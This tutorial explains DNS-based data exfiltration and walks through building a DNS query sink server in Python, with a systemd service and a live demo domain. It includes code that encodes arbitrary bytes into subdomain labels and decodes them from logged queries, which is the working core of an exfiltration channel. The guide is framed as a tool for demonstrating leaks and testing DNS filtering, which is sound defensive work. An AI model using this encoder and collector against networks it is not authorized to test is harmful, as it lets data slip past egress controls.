Introduction
DNS leaks are commonly discussed as a privacy concern when using VPNs or other privacy tools. However, the more serious danger is data exfiltration from protected environments, even those where inbound and outbound access is locked down.
The critical vulnerability is this: even if your DNS query goes to your private DNS resolver first, that resolver must eventually ask servers on the public internet about domains it does not know. If an attacker registers a domain and runs its authoritative DNS server, they can log these queries and extract sensitive data that was embedded in the subdomain.
This technique bypasses traditional network security controls because DNS traffic is typically allowed outbound, making it an ideal covert channel for data exfiltration.
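To make the "data embedded in the subdomain" idea concrete, here is a minimal sketch of how arbitrary bytes can be turned into valid hostnames. The function names, the 30-byte chunk size, and the choice of base32 are illustrative assumptions, not part of the monitoring script in this guide; the 63-byte label limit comes from RFC 1035.

```python
import base64

MAX_LABEL = 63   # RFC 1035: a single label may be at most 63 bytes
MAX_NAME = 253   # practical limit for a full name in dotted form


def encode_as_hostnames(payload: bytes, zone: str, chunk: int = 30) -> list[str]:
    """Split payload into chunks and render each as '<base32-label>.<zone>'."""
    names = []
    for i in range(0, len(payload), chunk):
        # Base32 only uses letters and the digits 2-7, so it survives in a hostname
        label = base64.b32encode(payload[i:i + chunk]).decode("ascii")
        label = label.rstrip("=").lower()
        name = f"{label}.{zone}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk too large for a DNS label")
        names.append(name)
    return names


def decode_label(label: str) -> bytes:
    """Reverse encode_as_hostnames for one captured label."""
    padded = label.upper() + "=" * (-len(label) % 8)
    return base64.b32decode(padded)
```

Whoever operates the authoritative server for the zone only needs to read the leftmost label of each logged query and pass it through something like `decode_label` to recover the original bytes.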
Live Demonstration
You can see this technique in action right now:
Try this test:
# This will fail to resolve - you'll get "Host not found"
ping leak-test.dnsleak.lorimar.net
Or try opening one of these in your browser (it will fail to load): http://another-leak-test.dnsleak.lorimar.net/ or http://your-secret-data.dnsleak.lorimar.net/, or any other subdomain of "dnsleak.lorimar.net".
Now check the results:
Visit http://ns.dnsleak.lorimar.net:8291/ and you'll see leak-test logged there, or whatever test string you used as a hostname (even though the DNS name doesn't actually exist).
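The same test can be scripted. The sketch below is one possible way to do it from Python with the standard library; the helper names are made up for illustration, and the zone defaults to the demo domain used above. A random label is used so that a cached negative answer in a resolver cannot hide the query.

```python
import socket
import uuid


def unique_test_hostname(zone: str = "dnsleak.lorimar.net") -> str:
    """Build a one-off hostname so resolver caches cannot suppress the query."""
    return f"t{uuid.uuid4().hex[:12]}.{zone}"


def trigger_lookup(hostname: str) -> bool:
    """Ask the system resolver for hostname; False means it did not resolve."""
    try:
        socket.getaddrinfo(hostname, None)
        return True
    except socket.gaierror:
        return False
```

Calling `trigger_lookup(unique_test_hostname())` is expected to return False, just like the failing ping, while the random label should still show up on the monitoring page if the query left your network.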
Why This Matters
This demonstrates how DNS queries reach someone’s monitoring server, allowing them to capture the subdomain portion - which could contain exfiltrated data.
This guide shows you how to build your own DNS leak detection and monitoring server to:
- Demonstrate the vulnerability to security teams and stakeholders
- Test network security controls and DNS filtering effectiveness
The server captures DNS queries for a specific test domain and provides a simple HTTP interface to view the results in real time.
Test Prerequisites
Before starting, ensure you have:
- Ubuntu 20.04+ server with root access
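- Python 3.10 or higher (Ubuntu 20.04 ships Python 3.8 by default, so a newer interpreter may need to be installed there)
- Network interface reachable from the internet on UDP port 53, so it can receive DNS traffic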
How It Works
- Create a subdomain of yourdomain.com, e.g. dnsleaktest.yourdomain.com, and delegate it with an NS record pointing to the server where you are installing the script.
- Install the script below.
- Use iptables, or other traffic manipulation software of your choice, to redirect UDP requests arriving on port 53 to the sink daemon on port 5353. With iptables, one such rule would be: iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-ports 5353
Installation and Setup
Step 1: Create the Python Script
Create the directory structure and install the script:
# Create application directory
sudo mkdir -p /opt/dns-monitor
# Create the Python script
sudo nano /opt/dns-monitor/dns_monitor.py
Copy the complete Python script below into this file, then set proper permissions:
#!/usr/bin/env python3
"""
DNS Subdomain Monitor — UDP proxy **sink** (no upstream, no replies, no root)
- Binds a UDP socket on a high port (default 5353)
- Parses incoming DNS queries, extracts subdomain before `dnsleaktest.yourdomain.com`
- Records uniques **in memory** and serves them via a localhost HTTP UI
- **Does not forward or reply** → external queries are silently dropped
Use with PREROUTING REDIRECT rules.
"""
import gc
import logging
import os
import re
import signal
import socket
import sys
import threading
import time
from datetime import datetime, timedelta
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from socketserver import ThreadingMixIn
from typing import Optional, Tuple
# ----------------------------- DNS helpers ----------------------------- #
def _read_labels(data: bytes, offset: int):
    """Parse DNS labels (RFC1035) with compression pointers. Returns (labels, next_offset) or (None, offset)."""
    labels = []
    jumped = False
    orig_offset = offset
    visited = 0
    while True:
        if offset >= len(data):
            return None, offset
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if (length & 0xC0) == 0xC0:
            if offset + 1 >= len(data):
                return None, offset + 1
            ptr = ((length & 0x3F) << 8) | data[offset + 1]
            if visited > 8:
                return None, offset + 2
            visited += 1
            if not jumped:
                orig_offset = offset + 2
                jumped = True
            offset = ptr
            continue
        start = offset + 1
        end = start + length
        if end > len(data):
            return None, end
        labels.append(data[start:end].decode('ascii', errors='ignore'))
        offset = end
    return labels, (orig_offset if jumped else offset)


def parse_qname_from_query(pkt: bytes) -> Optional[str]:
    if len(pkt) < 12:
        return None
    qdcount = int.from_bytes(pkt[4:6], 'big')
    if qdcount < 1:
        return None
    labels, _ = _read_labels(pkt, 12)
    if not labels:
        return None
    return '.'.join(labels).lower()
# -------------------------- Custom HTTP Server ------------------------ #
class RobustHTTPServer(ThreadingHTTPServer):
    """HTTPServer with better resource management"""
    # These are class attributes on purpose: the socket is bound inside
    # __init__, so setting them on the instance afterwards comes too late.
    # Allow reuse of address (SO_REUSEADDR is applied before bind)
    allow_reuse_address = True
    # Daemon threads do not prevent shutdown
    daemon_threads = True
    # Note: ThreadingMixIn has no thread cap (max_children only applies to
    # forking servers) and the server-level timeout is ignored by
    # serve_forever(); per-connection timeouts are set in the handler.
class DNSMonitorHTTPHandler(BaseHTTPRequestHandler):
    """HTTP handler with better resource management"""
    def __init__(self, dns_monitor, *args, **kwargs):
        self.dns_monitor = dns_monitor
        # Set timeouts to prevent hanging connections
        self.timeout = 30
        super().__init__(*args, **kwargs)

    def do_GET(self):
        try:
            with self.dns_monitor.stats_lock:
                self.dns_monitor.stats['http_requests'] += 1
            self.send_response(200)
            self.send_header('Content-Type', 'text/html; charset=utf-8')
            self.send_header('Connection', 'close')  # Force connection close
            self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
            self.end_headers()
            content = self.dns_monitor._page_content()
            html = self._generate_html(content)
            self.wfile.write(html.encode('utf-8'))
        except Exception as e:
            self.dns_monitor.logger.error(f"HTTP handler error: {e}")
        finally:
            # Mark the connection for closing. wfile must not be closed here:
            # the base class still flushes it after do_GET returns.
            self.close_connection = True

    def _generate_html(self, content: str) -> str:
        return f"""<!DOCTYPE html><html lang='en'><head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>DNS Leak Monitor</title>
<style>body{{font-family:'Courier New',monospace;background:#1a1a1a;color:#00ff00;margin:0;padding:20px}}.container{{max-width:1200px;margin:0 auto}}.header{{background:#2d2d2d;padding:20px;border-radius:8px;margin-bottom:20px;border-left:4px solid #ff6b6b}}.disclaimer{{background:#ff6b6b;color:#fff;padding:15px;border-radius:8px;margin-bottom:20px;font-weight:bold}}.content{{background:#2d2d2d;padding:20px;border-radius:8px;white-space:pre-wrap}}h1{{color:#00ff00;margin:0 0 10px 0}}.subtitle{{color:#888;font-size:14px}}.refresh-info{{color:#ffd700;font-size:12px;text-align:right;margin-top:10px}}</style>
</head><body><div class='container'>
<div class="disclaimer">
⚠️ EDUCATIONAL PURPOSE ONLY: This tool is designed for educational and authorized security testing purposes only.
Users must ensure they have proper authorization before monitoring any network traffic.
Unauthorized use may violate local laws and regulations. Use at your own risk.
<div class="content-section">
<h4>Permitted Usage</h4>
<ul>
<li>Educational research and training</li>
<li>Authorized security assessments</li>
</ul>
</div>
<div class="content-section">
<h4>Legal Requirements</h4>
<ul>
<li>Written authorization from network owners</li>
<li>Compliance with local privacy laws</li>
<li>Adherence to computer crime statutes</li>
</ul>
</div>
<div class="content-section">
<h4>Prohibited Activities</h4>
<ul>
<li>Unauthorized network reconnaissance</li>
<li>Malicious DNS traffic injection</li>
<li>Privacy violations or data theft</li>
</ul>
</div>
<div class="section">
<strong>Liability Disclaimer:</strong>
The developers, contributors, and distributors of this software disclaim all liability for damages resulting from unauthorized or improper use. Users assume full legal and financial responsibility for their actions.
</div>
</div>
<div class='header'><h1>🔍 DNS Leak Monitor</h1>
<div class='subtitle'>Try to lookup, browse or ping any test-hostname.dnsleaktest.yourdomain.com</div>
<div class='refresh-info'>Current time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</div></div>
<div class='content'>{content.replace('&','&amp;').replace('<','&lt;').replace('>','&gt;')}</div>
</div></body></html>"""
    def log_message(self, format, *args):
        # Suppress default HTTP logging to reduce log spam
        pass

    def handle_one_request(self):
        """Override to add better error handling"""
        try:
            super().handle_one_request()
        except Exception as e:
            self.dns_monitor.logger.error(f"HTTP request handling error: {e}")
        finally:
            # Force cleanup
            self.close_connection = True
# ------------------------------ Main class ----------------------------- #
class DNSMonitor:
    MAX_ENTRIES = 10  # cap in-memory growth

    def __init__(self,
                 port: int = 8291,
                 clean_interval: int = 300,
                 listen: str = "0.0.0.0:5353",
                 debug: bool = False):
        self.port = port
        self.clean_interval = clean_interval
        self.http_server = None
        self.running = False
        self.last_cleanup = datetime.now()
        self.http_restart_count = 0
        self.debug = debug
        # In-memory store: subdomain -> first_seen timestamp
        self.captured: dict[str, datetime] = {}
        self.captured_lock = threading.RLock()  # Thread-safe access
        # Statistics
        self.stats = {
            'dns_queries_received': 0,
            'dns_queries_parsed': 0,
            'subdomains_captured': 0,
            'http_requests': 0
        }
        self.stats_lock = threading.RLock()
        # DNS sink settings
        self.listen_host, self.listen_port = self._parse_hostport(listen, 5353)
        self.dns_sock: Optional[socket.socket] = None
        # Suffix to match and extract subdomain from
        self.target_suffix = ["dnsleaktest", "yourdomain", "com"]
        log_level = logging.DEBUG if debug else logging.INFO
        logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
        self.logger = logging.getLogger(__name__)
    # ---------------------------- Lifecycle ---------------------------- #
    def setup_signal_handlers(self):
        def handler(signum, frame):
            self.logger.info(f"Received signal {signum}, shutting down...")
            self.cleanup()
            sys.exit(0)
        signal.signal(signal.SIGINT, handler)
        signal.signal(signal.SIGTERM, handler)

    def cleanup(self):
        self.logger.info("Cleaning up...")
        self.running = False
        if self.http_server:
            try:
                self.http_server.shutdown()
                self.http_server.server_close()
            except Exception as e:
                self.logger.error(f"HTTP shutdown: {e}")
        if self.dns_sock:
            try:
                self.dns_sock.close()
            except Exception:
                pass
    # ---------------------------- In-memory store ----------------------- #
    def clear_store(self):
        with self.captured_lock:
            self.captured.clear()
            self.last_cleanup = datetime.now()
        self.logger.info("Cleared in-memory store")
        # Force garbage collection after cleanup
        gc.collect()

    def start_cleanup_timer(self):
        def worker():
            while self.running:
                try:
                    time.sleep(self.clean_interval)
                    if self.running:
                        self.clear_store()
                except Exception as e:
                    self.logger.error(f"Cleanup worker error: {e}")
        threading.Thread(target=worker, daemon=True).start()
        self.logger.info(f"Started cleanup timer (interval: {self.clean_interval} seconds)")

    def record_subdomain(self, sub: Optional[str]):
        if not sub:
            return
        if not re.fullmatch(r"[a-z0-9_-]+", sub):
            self.logger.debug(f"Rejected invalid subdomain format: {sub}")
            return
        with self.captured_lock:
            if sub in self.captured:
                return
            # cap growth
            if len(self.captured) >= self.MAX_ENTRIES:
                # drop oldest (dicts preserve insertion order)
                oldest_key = next(iter(self.captured))
                self.captured.pop(oldest_key)
                self.logger.debug(f"Dropped oldest subdomain: {oldest_key}")
            self.captured[sub] = datetime.now()
        with self.stats_lock:
            self.stats['subdomains_captured'] += 1
        self.logger.info(f"Captured subdomain: {sub}")
    # ---------------------------- DNS sink ----------------------------- #
    def _parse_hostport(self, s: str, default_port: int) -> Tuple[str, int]:
        if s.startswith("[") and "]" in s:
            host, _, rest = s[1:].partition("]")
            port = int(rest[1:]) if rest.startswith(":") and rest[1:].isdigit() else default_port
            return host, port
        if ':' in s and s.count(':') == 1:
            h, p = s.split(':', 1)
            try:
                return h, int(p)
            except ValueError:
                return h or '0.0.0.0', default_port
        return (s or '0.0.0.0'), default_port

    def _extract_target_subdomain(self, qname: str) -> Optional[str]:
        labels = qname.split('.')
        if len(labels) < 4:
            return None
        if labels[-3:] == self.target_suffix:
            # Only the label directly left of the suffix is captured
            return labels[-4].lower()
        return None
    def start_dns_sink(self):
        try:
            self.dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            # Increase socket buffer modestly for burst tolerance
            self.dns_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 512 * 1024)
            # Set socket timeout to prevent hanging - but longer to avoid too many timeouts
            self.dns_sock.settimeout(5.0)
            self.dns_sock.bind((self.listen_host, self.listen_port))
            self.logger.info(f"DNS sink listening on {self.listen_host}:{self.listen_port}")
        except Exception as e:
            self.logger.error(f"DNS sink startup failed: {e}")
            sys.exit(1)

        def serve():
            consecutive_errors = 0
            max_consecutive_errors = 10
            while self.running:
                try:
                    data, addr = self.dns_sock.recvfrom(4096)
                    consecutive_errors = 0  # Reset error counter on successful receive
                    with self.stats_lock:
                        self.stats['dns_queries_received'] += 1
                    # Parse & record; **do not** reply
                    try:
                        qname = parse_qname_from_query(data)
                        if qname:
                            with self.stats_lock:
                                self.stats['dns_queries_parsed'] += 1
                            sub = self._extract_target_subdomain(qname)
                            if sub:
                                self.record_subdomain(sub)
                            # Log all DNS queries in debug mode
                            if self.debug:
                                self.logger.debug(f"DNS query: {qname} from {addr[0]} -> subdomain: {sub}")
                        else:
                            if self.debug:
                                self.logger.debug(f"Failed to parse DNS query from {addr[0]}")
                    except Exception as e:
                        self.logger.debug(f"QNAME parse error: {e}")
                except socket.timeout:
                    continue  # Normal timeout, continue loop
                except OSError as e:
                    consecutive_errors += 1
                    if self.running:
                        self.logger.error(f"DNS socket error #{consecutive_errors}: {e}")
                    if consecutive_errors >= max_consecutive_errors:
                        self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
                        break
                    time.sleep(0.1)  # Brief pause before retry
                except Exception as e:
                    consecutive_errors += 1
                    self.logger.error(f"DNS receive error #{consecutive_errors}: {e}")
                    if consecutive_errors >= max_consecutive_errors:
                        self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
                        break
                    time.sleep(0.1)  # Brief pause before retry
        threading.Thread(target=serve, daemon=True).start()
    # --------------------------- HTTP UI with Monitoring --------------- #
    def _page_content(self) -> str:
        with self.captured_lock:
            with self.stats_lock:
                if not self.captured:
                    stats_info = (
                        f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                        f"# Statistics:\n"
                        f"# DNS queries received: {self.stats['dns_queries_received']}\n"
                        f"# DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
                        f"# Subdomains captured: {self.stats['subdomains_captured']}\n"
                        f"# HTTP requests served: {self.stats['http_requests']}\n"
                        f"# HTTP server restarts: {self.http_restart_count}\n\n"
                        "No DNS leak records captured yet.\n\n"
                        "Debug info:\n"
                        f"- Listening on {self.listen_host}:{self.listen_port}\n"
                        f"- Target suffix: {'.'.join(self.target_suffix)}\n"
                        f"- Debug mode: {'ON' if self.debug else 'OFF'}\n"
                    )
                    return stats_info
                next_cleanup = self.last_cleanup + timedelta(seconds=self.clean_interval)
                header = (
                    f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                    f"# Next cleanup: {next_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                    f"# Statistics:\n"
                    f"# DNS queries received: {self.stats['dns_queries_received']}\n"
                    f"# DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
                    f"# Subdomains captured: {self.stats['subdomains_captured']}\n"
                    f"# HTTP requests served: {self.stats['http_requests']}\n"
                    f"# HTTP server restarts: {self.http_restart_count}\n"
                    f"# Unique domains captured: {len(self.captured)}\n"
                    f"# Captured subdomains (first-seen order):\n\n"
                )
                body = "\n".join(self.captured.keys())
                return header + body
    def start_http_server(self, start_monitor: bool = True):
        try:
            # Create handler factory that properly binds the dns_monitor instance
            def handler_factory(*args, **kwargs):
                return DNSMonitorHTTPHandler(self, *args, **kwargs)
            self.http_server = RobustHTTPServer(('0.0.0.0', self.port), handler_factory)
            self.logger.info(f"HTTP UI: http://0.0.0.0:{self.port}")
            # Start server in a separate thread
            server_thread = threading.Thread(target=self.http_server.serve_forever, daemon=True)
            server_thread.start()
            # Start HTTP monitoring thread (once; restarts reuse the existing one)
            if start_monitor:
                self.start_http_monitor()
        except Exception as e:
            self.logger.error(f"HTTP server failed: {e}")
            sys.exit(1)

    def start_http_monitor(self):
        """Monitor HTTP server health and restart if needed"""
        def monitor():
            last_check = time.time()
            while self.running:
                try:
                    time.sleep(60)  # Check every minute
                    current_time = time.time()
                    # Check if server is still responding
                    if self.http_server and not self._is_http_healthy():
                        self.logger.warning("HTTP server appears unhealthy, restarting...")
                        self._restart_http_server()
                    # Force garbage collection every 10 minutes
                    if current_time - last_check > 600:
                        gc.collect()
                        last_check = current_time
                except Exception as e:
                    self.logger.error(f"HTTP monitor error: {e}")
        threading.Thread(target=monitor, daemon=True).start()
        self.logger.info("Started HTTP server monitor")

    def _is_http_healthy(self) -> bool:
        """Simple health check for HTTP server"""
        try:
            # Try to create a test socket connection
            test_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            test_sock.settimeout(5)
            result = test_sock.connect_ex(('127.0.0.1', self.port))
            test_sock.close()
            return result == 0
        except Exception:
            return False

    def _restart_http_server(self):
        """Restart the HTTP server"""
        try:
            if self.http_server:
                self.http_server.shutdown()
                self.http_server.server_close()
            # Wait a moment for cleanup
            time.sleep(2)
            # Force garbage collection
            gc.collect()
            # Restart server without spawning a second monitor thread
            self.start_http_server(start_monitor=False)
            self.http_restart_count += 1
            self.logger.info(f"HTTP server restarted (restart #{self.http_restart_count})")
        except Exception as e:
            self.logger.error(f"HTTP server restart failed: {e}")
    # ------------------------------ Run -------------------------------- #
    def run(self):
        self.setup_signal_handlers()
        self.running = True
        self.clear_store()
        self.start_cleanup_timer()
        self.start_dns_sink()
        self.start_http_server()
        self.logger.info("DNS Monitor started (sink mode)")
        try:
            while self.running:
                time.sleep(1)
        except KeyboardInterrupt:
            pass
        finally:
            self.cleanup()
# ------------------------------ CLI entry ------------------------------ #
def main():
    import argparse
    p = argparse.ArgumentParser(description='DNS Subdomain Monitor (UDP sink, in-memory)')
    p.add_argument('--port', '-p', type=int, default=8291, help='HTTP server port (default: 8291)')
    # Default now matches the help text and the DNSMonitor constructor (300 s)
    p.add_argument('--clean-interval', '-i', type=int, default=300, help='In-memory cleanup interval in seconds (default: 300=5m)')
    p.add_argument('--listen', default='0.0.0.0:5353', help='DNS sink listen address:port (default: 0.0.0.0:5353)')
    p.add_argument('--daemon', '-d', action='store_true', help='Run as daemon (fork to background)')
    p.add_argument('--debug', action='store_true', help='Enable debug logging')
    args = p.parse_args()
    if args.daemon:
        try:
            pid = os.fork()
            if pid > 0:
                print(f"DNS Monitor sink started with PID: {pid}")
                sys.exit(0)
        except OSError as e:
            print(f"Fork failed: {e}")
            sys.exit(1)
        os.setsid()
        os.chdir('/')
        with open('/dev/null', 'r') as f:
            os.dup2(f.fileno(), sys.stdin.fileno())
        with open('/dev/null', 'a') as f:
            os.dup2(f.fileno(), sys.stdout.fileno())
            os.dup2(f.fileno(), sys.stderr.fileno())
    DNSMonitor(port=args.port, clean_interval=args.clean_interval, listen=args.listen, debug=args.debug).run()


if __name__ == '__main__':
    main()
# Set executable permissions
sudo chmod +x /opt/dns-monitor/dns_monitor.py
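Before running the script, note that its `target_suffix` list is hard-coded to dnsleaktest.yourdomain.com and has to be changed to your own delegated subdomain. The matching rule can be restated as a standalone function to see what will and will not be captured. This is an illustrative rewrite (the module-level `TARGET_SUFFIX` and the function signature are assumptions made for the example), not a drop-in replacement for the method in the script.

```python
from typing import List, Optional

# Assumed placeholder; replace with the labels of your own delegated subdomain
TARGET_SUFFIX = ["dnsleaktest", "yourdomain", "com"]


def extract_target_subdomain(qname: str,
                             suffix: List[str] = TARGET_SUFFIX) -> Optional[str]:
    """Return the label directly left of the suffix, or None if it does not match."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) <= len(suffix):
        return None  # the bare suffix carries no extra label
    if labels[-len(suffix):] == suffix:
        return labels[-len(suffix) - 1]
    return None
```

Only the single label next to the suffix is kept: a query for a.b.dnsleaktest.yourdomain.com records "b" and ignores "a", and names under any other domain are dropped.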
Step 2: Test the Script
Before creating the service, test the script manually:
# Test basic functionality
sudo python3 /opt/dns-monitor/dns_monitor.py --help
# Run a quick test (Ctrl+C to stop)
sudo python3 /opt/dns-monitor/dns_monitor.py
In another terminal, you can test the HTTP interface:
# Check if the service is responding
curl http://localhost:8291
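At this point the sink listens on port 5353 but nothing is redirecting real DNS traffic to it yet. One way to exercise the parser anyway is to send it a hand-built query. The sketch below builds a minimal RFC 1035 query packet with the standard library; the function names and the fixed transaction ID are illustrative choices, and the default address assumes the script is running locally with its default `--listen` setting.

```python
import socket
import struct


def build_query(qname: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Build a minimal DNS query packet (RFC 1035) for qname."""
    # Header: ID, flags (recursion desired), QDCOUNT=1, other counts 0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = b""
    for label in qname.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError(f"invalid label: {label!r}")
        question += bytes([len(raw)]) + raw  # length-prefixed label
    # Root label terminator, then QTYPE and QCLASS=IN
    question += b"\x00" + struct.pack("!HH", qtype, 1)
    return header + question


def send_to_sink(qname: str, host: str = "127.0.0.1", port: int = 5353) -> None:
    """Send one query to the sink; it never replies, so no answer is awaited."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(build_query(qname), (host, port))
```

After `send_to_sink("manual-test.dnsleaktest.yourdomain.com")`, the label manual-test should appear in the output of the curl command above, provided the script's target suffix is still the placeholder domain.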
Creating the Systemd Service
Step 3: Service Configuration
# Create user and group
if ! id dnsmon >/dev/null 2>&1; then
    sudo groupadd --system dnsmon
    sudo useradd --system --no-create-home --shell /usr/sbin/nologin --gid dnsmon dnsmon
fi
# Fix ownership of your script directory
sudo chown -R dnsmon:dnsmon /opt/dns-monitor/
sudo chmod 755 /opt/dns-monitor/dns_monitor.py
Create a systemd service file:
sudo nano /etc/systemd/system/dns-monitor.service
The service configuration includes important security and reliability features:
[Unit]
Description=DNS Subdomain Monitor Daemon
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
User=dnsmon
Group=dnsmon
ExecStart=/usr/bin/python3 /opt/dns-monitor/dns_monitor.py
Restart=always
RestartSec=5
StandardOutput=journal
StandardError=journal
SyslogIdentifier=dns-monitor
# Working directory
WorkingDirectory=/opt/dns-monitor
# Environment
Environment=PYTHONUNBUFFERED=1
# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictSUIDSGID=true
RemoveIPC=true
PrivateDevices=true
[Install]
WantedBy=multi-user.target
Step 4: Enable and Start the Service
# Reload systemd configuration
sudo systemctl daemon-reload
# Enable the service to start on boot
sudo systemctl enable dns-monitor.service
# Start the service
sudo systemctl start dns-monitor.service
# Check service status
sudo systemctl status dns-monitor.service
Monitoring the Service
Use these commands to monitor your DNS monitor service:
# View real-time logs
sudo journalctl -u dns-monitor -f
# Check recent logs
sudo journalctl -u dns-monitor --since "10 minutes ago"
# View service resource usage
sudo systemctl show dns-monitor --property=MemoryCurrent,CPUUsageNSec
# Restart if needed
sudo systemctl restart dns-monitor
Testing and Validation
Step 5: Local Testing
Test your DNS leak detection server:
# 1. Verify the service is running
sudo systemctl is-active dns-monitor
# 2. Check if the port is listening
sudo ss -tulnp | grep 8291
# 3. Test HTTP interface locally
curl http://localhost:8291
# 4. Generate test DNS queries
for i in {1..5}; do
    nslookup "test${i}.dnsleaktest.yourdomain.com" 8.8.8.8
    sleep 1
done
# 5. Check if queries were captured
curl http://localhost:8291
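Step 5 can also be checked programmatically instead of reading the curl output by eye. The sketch below pulls the captured labels out of the page the script serves; it relies on the page layout produced by the script above (a single `<div class='content'>` block with one label per line) and on the same character set the script accepts. The function names are made up for this example.

```python
import re
import urllib.request
from typing import List


def captured_labels(page_html: str) -> List[str]:
    """Extract captured subdomain labels from the monitor's HTML page."""
    match = re.search(r"<div class='content'>(.*?)</div>", page_html, re.S)
    if not match:
        return []
    lines = [line.strip() for line in match.group(1).splitlines()]
    # Header lines start with '#'; labels are limited to [a-z0-9_-]
    return [line for line in lines if re.fullmatch(r"[a-z0-9_-]+", line)]


def fetch_captured(url: str = "http://localhost:8291") -> List[str]:
    """Fetch the monitor page and return the labels it currently lists."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return captured_labels(resp.read().decode("utf-8"))
```

If the delegation and the port redirect are working, `fetch_captured()` should include test1 through test5 after the loop above. Keep in mind that the script holds only `MAX_ENTRIES` labels and clears them on every cleanup interval.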
Remote Testing
From another machine that can reach the server:
# Replace YOUR_SERVER_IP with actual IP
curl http://YOUR_SERVER_IP:8291
# Test with telnet
telnet YOUR_SERVER_IP 8291
Conclusion
This setup enables you to test whether DNS queries can carry data out of your network, and to demonstrate that leak to the people responsible for its security controls.